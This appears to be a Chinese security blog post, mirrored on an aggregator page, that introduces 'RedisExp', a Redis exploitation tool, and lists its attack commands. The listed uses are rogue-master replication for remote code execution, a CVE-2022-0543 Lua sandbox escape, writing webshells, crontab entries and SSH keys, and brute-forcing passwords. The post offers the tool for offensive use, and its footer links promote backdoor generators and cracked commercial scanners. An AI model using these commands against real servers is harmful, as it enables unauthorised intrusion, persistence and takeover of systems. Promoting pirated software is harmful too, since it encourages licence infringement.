🔥 热搜 🔥
上海习近平新疆鄂州父女瓜乌鲁木齐疫情H工口小学生赛高习明泽芊川一笑图包印尼排华
分类
社会娱乐国际人权科技经济其它
🔥 热搜 🔥
百度今日热点微信公众平台贴吧opggdnf私服百度贴吧知乎dnf公益服百度傻逼
分类
社会娱乐国际人权科技经济其它
查看原文
其他

Redis漏洞利用工具

WIN哥学安全 2023-04-23
收录于合集 #安全工具 59个


0x01 工具介绍


Redis 漏洞利用工具。


0x02 安装与使用

常用命令:

主从复制命令执行:RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -execRedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console
Linux:RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -so exp.soRedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console -so exp.so
主从复制文件上传:RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -rfile dump.rdb -lfile dump.rdb -upload
主动关闭主从复制:RedisExp.exe -rhost 192.168.211.131 -slaveof
Lua沙盒绕过命令执行 CVE-2022-0543:RedisExp.exe -rhost 192.168.211.131 -lua -console
备份写 Webshell:RedisExp.exe -rhost 192.168.211.131 -shell
Linux 写计划任务:RedisExp.exe -rhost 192.168.211.131 -crontab
Linux 写 SSH 公钥:RedisExp.exe -rhost 192.168.211.131 -ssh
爆破 Redis 密码:RedisExp.exe -rhost 192.168.211.131 -brute -pwdf ../pass.txt
执行 Redis 命令:RedisExp.exe -rhost 192.168.211.131 -cli

往期推荐

Burp专业版、Xray高级版、Ladon更新合集





红队利器 | 阿波罗自动化攻击评估系统

Windows&Linux后门生成器


[ 红队知识库 ] 常见WAF拦截页面

应急响应思维导图分享-mir1ce师傅

Notepad++滚蛋,替代品推荐

Fortify Static Code Analyzer破解版

应急响应思维导图分享-mir1ce师傅

漏扫工具Invicti-Professional破解版

三款移动应用安全分析平台推荐

一次市hvv及省hvv的思路总结

Docker_Awvs15.x一键安装[支持版本更新]


最全应急响应流程-附命令和工具【建议收藏】

一款溯源取证工具——攻击类型检测并自动导出报告


适用于 2022 年红队行动的所有免费红队工具和模拟工具包

awvs 15.2破解版下载(Linux, Windows)

web安全手册(红队安全技能栈-下载)


APP漏洞挖掘(一)APP多种方式GetShell?

【宝藏】全网优秀攻防工具集成项目


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存